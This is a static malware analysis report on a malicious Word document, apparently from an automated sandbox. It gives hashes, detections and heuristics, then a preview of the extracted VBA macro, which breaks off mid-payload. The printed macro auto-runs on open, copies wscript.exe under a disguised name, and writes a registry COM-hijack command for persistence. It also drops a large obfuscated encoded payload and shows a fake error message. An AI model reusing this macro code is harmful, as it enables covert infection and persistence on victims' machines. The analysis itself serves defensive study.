Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7ec0523fca7bc8ee…

MALICIOUS

Office (OOXML)

30.7 KB Created: 2018-08-23 03:10:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2020-05-25
MD5: ee836e0f7a40571523bf56dba59898f6 SHA-1: 02ec4289ea7cc862d708fe163ecf884fe9d8707f SHA-256: 7ec0523fca7bc8eee27844038ce8ea985e0e0a95a9b906b917de9592929a966b
378 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218 System Binary Proxy Execution

The sample contains a VBA macro with a Document_Open auto-execution routine. This macro utilizes WScript.Shell and a LOLBin reference, indicating an attempt to execute arbitrary code. The presence of these critical heuristics strongly suggests the document is designed to download and execute a secondary payload, likely leveraging system binaries for execution.

Heuristics 10

  • ClamAV: Doc.Trojan.Agent-6923201-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Agent-6923201-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim PdWkQsFOTJJajPBLIcbWkYDN As Object
        Set PdWkQsFOTJJajPBLIcbWkYDN = CreateObject("WScript.Shell")
        PdWkQsFOTJJajPBLIcbWkYDN.RegWrite gvZwdQOirrfB, TnbMvyqNwKQlpRBnlKUsWHk, "REG_SZ"
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        If OFSO.FolderExists(arcPath) = True Then
            FileCopy wRXfRfhGCxCPW & "\Windows\SysWOW64\wscript.exe", rzfevexNwMGnPWXpK & "\msohtml.exe"
        Else
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim PdWkQsFOTJJajPBLIcbWkYDN As Object
        Set PdWkQsFOTJJajPBLIcbWkYDN = CreateObject("WScript.Shell")
        PdWkQsFOTJJajPBLIcbWkYDN.RegWrite gvZwdQOirrfB, TnbMvyqNwKQlpRBnlKUsWHk, "REG_SZ"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
        On Error Resume Next
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Dim FxrIUmVmgUiWfGXVnAnEPgZ As String
        FxrIUmVmgUiWfGXVnAnEPgZ = Environ("temp")
        TnbMvyqNwKQlpRBnlKUsWHk = FxrIUmVmgUiWfGXVnAnEPgZ & "\msohtml.exe"
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 22563 bytes
SHA-256: 4d0a30fefc9e2b0f5c73acb18346d9db3e814a670fe82fdc47b03842704958c3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
179 of 270 identifiers look randomly generated (e.g. 'LDY1MSw2OTUsNzQ5LDc1Miw3NDksNjgxLDY0NSw2') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function CoCreateGuid Lib "OLE32.DLL" (pGuid As hXgFaVZLEaiKwzLqv) As LongPtr
#Else
    Private Declare Function CoCreateGuid Lib "OLE32.DLL" (pGuid As hXgFaVZLEaiKwzLqv) As Long
#End If


Private Type hXgFaVZLEaiKwzLqv
    bVVEdJCmGdZvSxJjgkDzm As Long
    zuTOmqOrHzTiruTul As Integer
    ikZiOOfstTnTLVyDJPtLvZhi As Integer
    stTnTLVyDJPdsf3d(0 To 7) As Byte
End Type

Public Function rgmbpzZsmHAHge() As String
    Dim SDJgLaifFfuWl As hXgFaVZLEaiKwzLqv
    With SDJgLaifFfuWl
    If (CoCreateGuid(SDJgLaifFfuWl) = 0) Then
    rgmbpzZsmHAHge = _
        String$(8 - Len(Hex$(.bVVEdJCmGdZvSxJjgkDzm)), "0") & Hex$(.bVVEdJCmGdZvSxJjgkDzm) & "-" & _
        String$(4 - Len(Hex$(.zuTOmqOrHzTiruTul)), "0") & Hex$(.zuTOmqOrHzTiruTul) & "-" & _
        String$(4 - Len(Hex$(.ikZiOOfstTnTLVyDJPtLvZhi)), "0") & Hex$(.ikZiOOfstTnTLVyDJPtLvZhi) & "-" & _
        IIf((.stTnTLVyDJPdsf3d(0) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(0)) & _
        IIf((.stTnTLVyDJPdsf3d(1) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(1)) & "-" & _
        IIf((.stTnTLVyDJPdsf3d(2) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(2)) & _
        IIf((.stTnTLVyDJPdsf3d(3) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(3)) & _
        IIf((.stTnTLVyDJPdsf3d(4) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(4)) & _
        IIf((.stTnTLVyDJPdsf3d(5) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(5)) & _
        IIf((.stTnTLVyDJPdsf3d(6) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(6)) & _
        IIf((.stTnTLVyDJPdsf3d(7) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(7))
    End If
    End With
End Function
Function HLKBVQlJEPWph(gvZwdQOirrfB As String)
    Dim TnbMvyqNwKQlpRBnlKUsWHk, MBrUZCnACSJYjdxmUAnw
    Dim FxrIUmVmgUiWfGXVnAnEPgZ As String
    FxrIUmVmgUiWfGXVnAnEPgZ = Environ("temp")
    TnbMvyqNwKQlpRBnlKUsWHk = FxrIUmVmgUiWfGXVnAnEPgZ & "\msohtml.exe"
    TnbMvyqNwKQlpRBnlKUsWHk = TnbMvyqNwKQlpRBnlKUsWHk & " //E:vbscript /b " & FxrIUmVmgUiWfGXVnAnEPgZ
    TnbMvyqNwKQlpRBnlKUsWHk = TnbMvyqNwKQlpRBnlKUsWHk & "\msohtml.log"
    
    Dim PdWkQsFOTJJajPBLIcbWkYDN As Object
    Set PdWkQsFOTJJajPBLIcbWkYDN = CreateObject("WScript.Shell")
    PdWkQsFOTJJajPBLIcbWkYDN.RegWrite gvZwdQOirrfB, TnbMvyqNwKQlpRBnlKUsWHk, "REG_SZ"
End Function
Private Sub Document_Open()
    On Error Resume Next
    Dim FxrIUmVmgUiWfGXVnAnEPgZ As String
    FxrIUmVmgUiWfGXVnAnEPgZ = Environ("temp")
    
    Dim gvZwdQOirrfB, MBrUZCnACSJYjdxmUAnw
    MBrUZCnACSJYjdxmUAnw = rgmbpzZsmHAHge
    gvZwdQOirrfB = "HKCU\Software\Classes\CLSID\{"
    gvZwdQOirrfB = gvZwdQOirrfB & MBrUZCnACSJYjdxmUAnw
    gvZwdQOirrfB = gvZwdQOirrfB & "}\Shell\Manage\Command\"
    
    PRuhLvyjtAPrH FxrIUmVmgUiWfGXVnAnEPgZ
    yiBhyERIualWRmBjcsIbCZLq (MBrUZCnACSJYjdxmUAnw)
    HLKBVQlJEPWph (gvZwdQOirrfB)
    ActiveDocument.Range.Text = "Error : 0x8004fc12"
End Sub
Function PRuhLvyjtAPrH(rzfevexNwMGnPWXpK As String)
    Dim tgrIRwdsnmuquriMIt As String
    tgrIRwdsnmuquriMIt = rzfevexNwMGnPWXpK & "\msohtml.log"
        Data = Data + "Y3M9QXJyYXkoNjQyLDY3NSw3NDksNjQ4LDcwMyw3MDMsNjc0LDcwMyw3NDksNjcxLDY4MCw3MDIsNjk2"
    Data = Data + "LDY3Miw2ODAsNzQ5LDY0Myw2ODAsNjkzLDY5Nyw3MTEsNjUxLDY5Niw2NzUsNjg2LDY5Nyw2NzYsNjc0"
    Data = Data + "LDY3NSw3NDksNjc0LDY1MSw2OTUsNjk3LDY0OSw2NTAsNjY3LDY0Myw2ODQsNjc3LDY0OSw2NzMsNjk3"
    Data = Data + "LDY5NSw3MDAsNjcxLDcwMyw2NDAsNjYwLDc0MSw2NDUsNjkyLDY0MSw2NjcsNjQ4LDcwMiw2NjEsNjQy"
    Data = Data + "LDY4Nyw2NzAsNjgyLDY4Miw3MDIsNjQ1LDY2Myw2NjgsNjg0LDcwMCw2ODcsNjc2LDY1NCw2NjAsNzAz"
    Data = Data + "LDczNyw2NDksNjcyLDY0MSw2NTEsNjk3LDY5Nyw2NjMsNjQ4LDY0NSw3MDMsNjgyLDY5Niw2NDksNjQy"
    Data = Data + "LDY4Myw2NjgsNjgzLDc0MCw3MTEsNjc0LDY1MSw2OTUsNjk3LDY0OSw2NTAsNjY3LDY0Myw2ODQsNjc3"
    Data = Data + "LDY0OSw2NzMsNjk3LDY5NSw3MDAsNjcxLDcwMyw2NDAsNjYwLDc0OSw3NTIsNzQ5LDY0NSw2OTIsNjQx"
    Data = Data + "LDY2Nyw2NDgsNzAyLDY2MSw2NDIsNjg3LDY3MCw2ODIsNjgyLDcwMiw2NDUsNjYzLDY2OCw2ODQsNzAw"
    Data = Data + "LDY4Nyw2NzYsNjU0LDY2MCw3MDMsNzQ5LDc0Miw3NDksNjQ5LDY3Miw2NDEsNjUxLDY5Nyw2OTcsNjYz"
    Data = Data + "LDY0OCw2NDUsNzAzLDY4Miw2OTYsNjQ5LDY0Miw2ODMsNjY4LDY4Myw3MTEsNjQ4LDY3NSw2ODEsNzQ5"
    Data = Data + "LDY1MSw2OTYsNjc1LDY4Niw2OTcsNjc2LDY3NCw2NzUsNzExLDY0OSw2NzYsNjcyLDc0OSw2NjksNjQ2"
    Data = Data + "LDY0Myw2NzUsNjk1LDY1Miw2NzcsNjgyLDY5NSw2NjgsNjc2LDY2NSw2NjEsNjQ4LDY2Myw2NzMsNjg2"
    Data = Data + "LDY2NSw3MzcsNjc4LDY0OSw2NTAsNzAwLDY4Miw2ODEsNjQzLDY5Niw2OTcsNjgxLDY3NCw2NDQsNjc2"
    Data = Data + "LDY3MCw2NzYsNjc5LDY0NCw2NzMsNjczLDY0NCw2NjQsNjQ5LDY4MSw3MzcsNjQ5LDY5NSw3MDEsNjk4"
    Data = Data + "LDY3Myw2NTAsNjYzLDcwMCw2OTIsNjYwLDY4MSw2NzgsNjcxLDY5Nyw2NzIsNjc3LDY2MSw3MDMsNzEx"
    Data = Data + "LDY3MSw2ODQsNjc1LDY4MSw2NzQsNjcyLDY3Niw2OTUsNjgwLDcxMSw2NzgsNjQ5LDY1MCw3MDAsNjgy"
    Data = Data + "LDY4MSw2NDMsNjk2LDY5Nyw2ODEsNjc0LDY0NCw2NzYsNjcwLDY3Niw2NzksNjQ0LDY3Myw2NzMsNjQ0"
    Data = Data + "LDY2NCw2NDksNjgxLDc0OSw3NTIsNzQ5LDY3MSw2NzUsNjgxLDcxMSw2NDksNjk1LDcwMSw2OTgsNjcz"
    Data = Data + "LDY1MCw2NjMsNzAwLDY5Miw2NjAsNjgxLDY3OCw2NzEsNjk3LDY3Miw2NzcsNjYxLDcwMyw3NDksNzUy"
    Data = Data + "LDc0OSw2NzEsNjc1LDY4MSw3MTEsNjY5LDY0Niw2NDMsNjc1LDY5NSw2NTIsNjc3LDY4Miw2OTUsNjY4"
    Data = Data + "LDY3Niw2NjUsNjYxLDY0OCw2NjMsNjczLDY4Niw2NjUsNzQ5LDc1Miw3NDksNjc0LDY1MSw2OTUsNjk3"
    Data = Data + "LDY0OSw2NTAsNjY3LDY0Myw2ODQsNjc3LDY0OSw2NzMsNjk3LDY5NSw3MDAsNjcxLDcwMyw2NDAsNjYw"
    Data = Data + "LDc0MSw2NzgsNjQ5LDY1MCw3MDAsNjgyLDY4MSw2NDMsNjk2LDY5Nyw2ODEsNjc0LDY0NCw2NzYsNjcw"
    Data = Data + "LDY3Niw2NzksNjQ0LDY3Myw2NzMsNjQ0LDY2NCw2NDksNjgxLDczNyw2NDksNjk1LDcwMSw2OTgsNjcz"
    Data = Data + "LDY1MCw2NjMsNzAwLDY5Miw2NjAsNjgxLDY3OCw2NzEsNjk3LDY3Miw2NzcsNjYxLDcwMyw3NDAsNzEx"
    Data = Data + "LDY1MSw2OTYsNjc1LDY4Niw2OTcsNjc2LDY3NCw2NzUsNzQ5LDY4MSw2NDUsNjUyLDY1MCw2ODcsNjc2"
    Data = Data + "LDY4Niw2NzYsNjcxLDY0Myw2OTMsNjg3LDY5Miw3NDEsNzQ5LDY2NSw2NDEsNjU0LDY4MCw2NDYsNjk1"
    Data = Data + "LDY4Myw2OTksNjgxLDY2NCw2NjYsNjQwLDY0NCw2ODEsNjY4LDc0OSw3NDAsNzExLDc0OSw3NDksNzQ5"
    Data = Data + "LDc0OSw2NDksNjc2LDY3Miw3NDksNjQ3LDY3Miw2NjQsNjc3LDY2OSw2NDEsNjU0LDY0MSw2NzIsNjQ1"
    Data = Data + "LDY5Niw2NzgsNjQ3LDczNyw3NDksNjg2LDcwMiw2NzgsNjg0LDY4MCw2NTQsNjcyLDY1MCw2ODYsNjcz"
    Data = Data + "LDY3NCw2OTUsNzQxLDc0OSw3NDAsNzExLDc0OSw3NDksNzQ5LDc0OSw2NzEsNjgwLDY0OSw2NzYsNjcy"
    Data = Data + "LDc0OSw2ODYsNzAyLDY3OCw2ODQsNjgwLDY1NCw2NzIsNjUwLDY4Niw2NzMsNjc0LDY5NSw3NDEsNzQ5"
    Data = Data + "LDY0MSw2ODAsNjc1LDc0MSw3NDksNjY1LDY0MSw2NTQsNjgwLDY0Niw2OTUsNjgzLDY5OSw2ODEsNjY0"
    Data = Data + "LDY2Niw2NDAsNjQ0LDY4MSw2NjgsNzQ5LDc0MCw3NDksNzM2LDc0OSw3NjQsNzQ5LDc0MCw3MTEsNzQ5"
    Data = Data + "LDc0OSw3NDksNzQ5LDY1MSw2NzQsNzAzLDc0OSw2NDcsNjcyLDY2NCw2NzcsNjY5LDY0MSw2NTQsNjQx"
    Data = Data + "LDY3Miw2NDUsNjk2LDY3OCw2NDcsNzQ5LDc1Miw3NDksNzY1LDc0OSw2NjUsNjc0LDc0OSw2NjQsNjU1"
    Data = Data + "LDY3NCw2OTYsNjc1LDY4MSw3NDEsNzQ5LDY4Niw3MDIsNjc4LDY4NCw2ODAsNjU0LDY3Miw2NTAsNjg2"
    Data = Data + "LDY3Myw2NzQsNjk1LDc0OSw3NDAsNzExLDc0OSw3NDksNzQ5LDc0OSw3NDksNzQ5LDc0OSw3NDksNjg2"
    Data = Data + "LDcwMiw2NzgsNjg0LDY4MCw2NTQsNjcyLDY1MCw2ODYsNjczLDY3NCw2OTUsNzQxLDY0Nyw2NzIsNjY0"
    Data = Data + "LDY3Nyw2NjksNjQxLDY1NCw2NDEsNjcyLDY0NSw2OTYsNjc4LDY0Nyw3NDAsNzQ5LDc1Miw3NDksNjUy"
    Data = Data + "LDcwMiw2ODYsNzQxLDc0OSw2NDAsNjc2LDY4MSw3NDEsNzQ5LDY2NSw2NDEsNjU0LDY4MCw2NDYsNjk1"
    Data = Data + "LDY4Myw2OTksNjgxLDY2NCw2NjYsNjQwLDY0NCw2ODEsNjY4LDczNyw3NDksNjQ3LDY3Miw2NjQsNjc3"
    Data = Data + "LDY2OSw2NDEsNjU0LDY0MSw2NzIsNjQ1LDY5Niw2NzgsNjQ3LDc0OSw3NDIsNzQ5LDc2NCw3MzcsNzQ5"
    Data = Data + "LDc2NCw3NDksNzQwLDc0OSw3NDAsNzExLDc0OSw3NDksNzQ5LDc0OSw2NDMsNjgwLDY5Myw2OTcsNzEx"
    Data = Data + "LDc0OSw3NDksNzQ5LDc0OSw2ODEsNjQ1LDY1Miw2NTAsNjg3LDY3Niw2ODYsNjc2LDY3MSw2NDMsNjkz"
    Data = Data + "LDY4Nyw2OTIsNzQ5LDc1Miw3NDksNjg2LDcwMiw2NzgsNjg0LDY4MCw2NTQsNjcyLDY1MCw2ODYsNjcz"
    Data = Data + "LDY3NCw2OTUsNzExLDY0OCw2NzUsNjgxLDc0OSw2NTEsNjk2LDY3NSw2ODYsNjk3LDY3Niw2NzQsNjc1"
    Data = Data + "LDcxMSw2NDksNjc2LDY3Miw3NDksNjUyLDY0OSw2NDksNjg3LDcwMCw2NjEsNjk4LDY0NSw2NzEsNjgx"
    Data = Data + "LDY0Niw2NTEsNjk1LDcxMSw2NTIsNjQ5LDY0OSw2ODcsNzAwLDY2MSw2OTgsNjQ1LDY3MSw2ODEsNjQ2"
    Data = Data + "LDY1MSw2OTUsNzQ5LDc1Miw3NDksNjgxLDY0NSw2NTIsNjUwLDY4Nyw2NzYsNjg2LDY3Niw2NzEsNjQz"
    Data = Data + "LDY5Myw2ODcsNjkyLDc0MSw2NjYsNjg2LDY5Niw2NDUsNjYwLDY5Miw2NjksNjk1LDY1NCw2NDMsNjc0"
    Data = Data + "LDY0MSw2NjcsNjQ1LDcwMCw2NTAsNjUyLDY2Myw2NTAsNjkyLDY1MCw2ODcsNzQwLDcxMSw2NTEsNjk2"
    Data = Data + "LDY3NSw2ODYsNjk3LDY3Niw2NzQsNjc1LDc0OSw2ODMsNjgxLDcwMCw2NTUsNzAzLDY5Niw2NTIsNjQ2"
    Data = Data + "LDY1Miw2NzUsNjY3LDY1MCw2NDksNjY1LDcwMiw2NDEsNjcxLDc0MSw3NDksNjgwLDY5Nyw2NDYsNjQw"
    Data = Data + "LDY1MSw2NzMsNjQ5LDY0Niw2NTEsNjc5LDY2NCw2OTksNjY2LDY2NCw2OTMsNjgwLDY1NSw2NzYsNjY3"
    Data = Data + "LDY1Miw2NDEsNzQ5LDc0MCw3MTEsNzQ5LDc0OSw3NDksNzQ5LDY0OSw2NzYsNjcyLDc0OSw2NDMsNjc1"
    Data = Data + "LDY3OSw2ODEsNjY3LDY3Niw2OTksNjQ2LDY4MSw2NzEsNjYzLDcwMyw2ODAsNzAzLDY1NSw2ODAsNjk5"
    Data = Data + "LDY0MCw2NDksNjc0LDY0Niw2ODAsNjc0LDY0OCw3MzcsNzQ5LDY3Niw2NDYsNjc2LDY5Nyw2OTMsNjUw"
    Data = Data + "LDY3Nyw2NDksNjg0LDcwMCw2OTcsNjgwLDY4Myw2NDgsNjUyLDY0Nyw2NTUsNjkzLDY5Niw2NzksNjY0"
    Data = Data + "LDY0NSw3NDEsNzQ5LDc0MCw3MTEsNzQ5LDc0OSw3NDksNzQ5LDY3MSw2ODAsNjQ5LDY3Niw2NzIsNzQ5"
    Data = Data + "LDY3Niw2NDYsNjc2LDY5Nyw2OTMsNjUwLDY3Nyw2NDksNjg0LDcwMCw2OTcsNjgwLDY4Myw2NDgsNjUy"
    Data = Data + "LDY0Nyw2NTUsNjkzLDY5Niw2NzksNjY0LDY0NSw3NDEsNzQ5LDY0MSw2ODAsNjc1LDc0MSw3NDksNjgw"
    Data = Data + "LDY5Nyw2NDYsNjQwLDY1MSw2NzMsNjQ5LDY0Niw2NTEsNjc5LDY2NCw2OTksNjY2LDY2NCw2OTMsNjgw"
    Data = Data + "LDY1NSw2NzYsNjY3LDY1Miw2NDEsNzQ5LDc0MCw3NDksNzM2LDc0OSw3NjQsNzQ5LDc0MCw3MTEsNzQ5"
    Data = Data + "LDc0OSw3NDksNzQ5LDY1MSw2NzQsNzAzLDc0OSw2NDMsNjc1LDY3OSw2ODEsNjY3LDY3Niw2OTksNjQ2"
    Data = Data + "LDY4MSw2NzEsNjYzLDcwMyw2ODAsNzAzLDY1NSw2ODAsNjk5LDY0MCw2NDksNjc0LDY0Niw2ODAsNjc0"
    Data = Data + "LDY0OCw3NDksNzUyLDc0OSw3NjUsNzQ5LDY2NSw2NzQsNzQ5LDY2NCw2NTUsNjc0LDY5Niw2NzUsNjgx"
    Data = Data + "LDc0MSw3NDksNjc2LDY0Niw2NzYsNjk3LDY5Myw2NTAsNjc3LDY0OSw2ODQsNzAwLDY5Nyw2ODAsNjgz"
    Data = Data + "LDY0OCw2NTIsNjQ3LDY1NSw2OTMsNjk2LDY3OSw2NjQsNjQ1LDc0OSw3NDAsNzExLDc0OSw3NDksNzQ5"
    Data = Data + "LDc0OSw3NDksNzQ5LDc0OSw3NDksNjc2LDY0Niw2NzYsNjk3LDY5Myw2NTAsNjc3LDY0OSw2ODQsNzAw"
    Data = Data + "LDY5Nyw2ODAsNjgzLDY0OCw2NTIsNjQ3LDY1NSw2OTMsNjk2LDY3OSw2NjQsNjQ1LDc0MSw2NDMsNjc1"
    Data = Data + "LDY3OSw2ODEsNjY3LDY3Niw2OTksNjQ2LDY4MSw2NzEsNjYzLDcwMyw2ODAsNzAzLDY1NSw2ODAsNjk5"
    Data = Data + "LDY0MCw2NDksNjc0LDY0Niw2ODAsNjc0LDY0OCw3NDAsNzQ5LDc1Miw3NDksNjUyLDcwMiw2ODYsNzQx"
    Data = Data + "LDc0OSw2NDAsNjc2LDY4MSw3NDEsNzQ5LDY4MCw2OTcsNjQ2LDY0MCw2NTEsNjczLDY0OSw2NDYsNjUx"
    Data = Data + "LDY3OSw2NjQsNjk5LDY2Niw2NjQsNjkzLDY4MCw2NTUsNjc2LDY2Nyw2NTIsNjQxLDczNyw3NDksNjQz"
    Data = Data + "LDY3NSw2NzksNjgxLDY2Nyw2NzYsNjk5LDY0Niw2ODEsNjcxLDY2Myw3MDMsNjgwLDcwMyw2NTUsNjgw"
    Data = Data + "LDY5OSw2NDAsNjQ5LDY3NCw2NDYsNjgwLDY3NCw2NDgsNzQ5LDc0Miw3NDksNzY0LDczNyw3NDksNzY0"
    Data = Data + "LDc0OSw3NDAsNzQ5LDc0MCw3MTEsNzQ5LDc0OSw3NDksNzQ5LDY0Myw2ODAsNjkzLDY5Nyw3MTEsNzQ5"
    Data = Data + "LDc0OSw3NDksNzQ5LDY4Myw2ODEsNzAwLDY1NSw3MDMsNjk2LDY1Miw2NDYsNjUyLDY3NSw2NjcsNjUw"
    Data = Data + "LDY0OSw2NjUsNzAyLDY0MSw2NzEsNzQ5LDc1Miw3NDksNjc2LDY0Niw2NzYsNjk3LDY5Myw2NTAsNjc3"
    Data = Data + "LDY0OSw2ODQsNzAwLDY5Nyw2ODAsNjgzLDY0OCw2NTIsNjQ3LDY1NSw2OTMsNjk2LDY3OSw2NjQsNjQ1"
    Data = Data + "LDcxMSw2NDgsNjc1LDY4MSw3NDksNjUxLDY5Niw2NzUsNjg2LDY5Nyw2NzYsNjc0LDY3NSw3MTEsNjQ5"
    Data = Data + "LDY3Niw2NzIsNzQ5LDY2MCw2NDAsNjQ0LDY3OSw2NDIsNzAxLDY0NSw2OTMsNjY0LDcwMSw2OTgsNjcz"
    Data = Data + "LDY4Nyw2OTcsNjQ0LDcwMyw2NzYsNjc1LDcxMSw2ODYsNzAyLDc1Miw2NTIsNzAzLDcwMyw2ODQsNjky"
    Data = Data + "LDc0MSw3NjYsNzU3LDc2Nyw3MzcsNzY2LDc2MCw3NjQsNzM3LDc2Nyw3NjIsNzY2LDczNyw3NjYsNzYy"
    Data = Data + "LDc2Nyw3MzcsNzY2LDc2Nyw3NjYsNzM3LDc2Niw3NjcsNzY2LDczNyw3NjYsNzYwLDc2NSw3MzcsNzY2"
    Data = Data + "LDc2Nyw3NjYsNzM3LDc2Nyw3NjIsNzY2LDczNyw3NjYsNzYwLDc2MCw3MzcsNzY2LDc2MSw3NjUsNzM3"
    Data = Data + "LDc2Niw3NjcsNzY3LDczNyw3NjYsNzY3LDc2MSw3MzcsNzY2LDc2MSw3NTcsNzM3LDc2Niw3NjEsNzY1"
    Data = Data + "LDczNyw3NjcsNzYyLDc2Niw3MzcsNzY2LDc1Nyw3NjYsNzM3LDc2Niw3NjEsNzY1LDczNyw3NjYsNzY3"
    Data = Data + "LDc1Niw3MzcsNzY2LDc2Nyw3NjAsNzM3LDc2Nyw3NjIsNzY2LDczNyw3NjcsNzYzLDc2Miw3MzcsNzY3"
    Data = Data + "LDc2Miw3NjYsNzM3LDc2Niw3NjcsNzY3LDczNyw3NjYsNzYxLDc2NSw3MzcsNzY2LDc2Nyw3NjAsNzM3"
    Data = Data + "LDc2Nyw3NjIsNzY2LDczNyw3NjYsNzYzLDc1Nyw3MzcsNzY2LDc2Miw3NjcsNzM3LDc2Niw3NjIsNzY3"
    Data = Data + "LDczNyw3NjYsNzYwLDc1Niw3MzcsNzY2LDc2MSw3NjEsNzM3LDc2Niw3NjcsNzY2LDczNyw3NjYsNzYz"
    Data = Data + "LDc1Nyw3MzcsNzY2LDc2MSw3NjUsNzM3LDc2Niw3NjEsNzYwLDczNyw3NjYsNzYyLDc2Nyw3MzcsNzY2"
    Data = Data + "LDc2Nyw3NjcsNzM3LDc2Niw3NjMsNzY2LDczNyw3NjYsNzYyLDc2NSw3MzcsNzY2LDc2Miw3NjMsNzM3"
    Data = Data + "LDc2Niw3NjcsNzYyLDczNyw3NjYsNzY3LDc1Nyw3MzcsNzY2LDc2MCw3NjMsNzM3LDc2Niw3NjAsNzYw"
    Data = Data + "LDczNyw3NjYsNzYwLDc2Myw3MzcsNzY2LDc2MCw3NTYsNzM3LDc2Niw3NjEsNzY0LDczNyw3NjYsNzY2"
    Data = Data + "LDc2Myw3MzcsNzY2LDc2MSw3NjYsNzM3LDc2Niw3NTcsNzY0LDczNyw3NjcsNzYyLDc2Niw3MzcsNzY3"
    Data = Data + "LDc2Myw3NTcsNzM3LDc2Nyw3NjIsNzY2LDczNyw3NjYsNzYyLDc2MSw3MzcsNzY2LDc2MSw3NjUsNzM3"
    Data = Data + "LDc2Niw3NjcsNzYwLDczNyw3NjYsNzU3LDc2Nyw3MzcsNzY2LDc2Niw3NTYsNzM3LDc2Niw3NjEsNzYy"
    Data = Data + "LDczNyw3NjYsNzYxLDc2NSw3MzcsNzY2LDc2Niw3NTcsNzM3LDc2Niw3NjcsNzYwLDczNyw3NjcsNzU3"
    Data = Data + "LDc2NCw3MzcsNzY3LDc2Miw3NjAsNzM3LDc2Niw3NjcsNzY3LDczNyw3NjYsNzY2LDc1Nyw3MzcsNzY2"
    Data = Data + "LDc2Nyw3NjYsNzM3LDc2Niw3NjEsNzYxLDczNyw3NjYsNzY3LDc2NCw3MzcsNzY2LDc2Nyw3NjAsNzM3"
    Data = Data + "LDc2Nyw3NjMsNzYyLDczNyw3NjYsNzYxLDc2MCw3MzcsNzY2LDc2Nyw3NjAsNzM3LDc2Niw3NjcsNzYw"
    Data = Data + "LDczNyw3NjYsNzY3LDc2NCw3MzcsNzY2LDc2Nyw3NjcsNzM3LDc2Nyw3NjMsNzYyLDczNyw3NjcsNzU3"
    Data = Data + "LDc2Myw3MzcsNzY3LDc1Nyw3NjMsNzM3LDc2Niw3NjAsNzY1LDczNyw3NjYsNzY3LDc2NCw3MzcsNzY2"
    Data = Data + "LDc2MSw3NjUsNzM3LDc2Niw3NjAsNzY0LDczNyw3NjcsNzU3LDc2Miw3MzcsNzY2LDc2Niw3NTYsNzM3"
    Data = Data + "LDc2Niw3NjEsNzY1LDczNyw3NjYsNzY3LDc2MCw3MzcsNzY2LDc2Niw3NjMsNzM3LDc2Niw3NjAsNzY1"
    Data = Data + "LDczNyw3NjYsNzYxLDc2Niw3MzcsNzY2LDc2MSw3NjYsNzM3LDc2Niw3NjEsNzYxLDczNyw3NjYsNzY2"
    Data = Data + "LDc1Nyw3MzcsNzY2LDc2MSw3NjUsNzM3LDc2Nyw3NTcsNzYyLDczNyw3NjYsNzYwLDc2NCw3MzcsNzY2"
    Data = Data + "LDc2MSw3NjUsNzM3LDc2Niw3NjcsNzYwLDczNyw3NjcsNzU3LDc2Myw3MzcsNzY2LDc2MSw3NjQsNzM3"
    Data = Data + "LDc2Niw3NjcsNzY2LDczNyw3NjYsNzY2LDc2Myw3MzcsNzY2LDc2Niw3NjMsNzM3LDc2Nyw3NTcsNzYy"
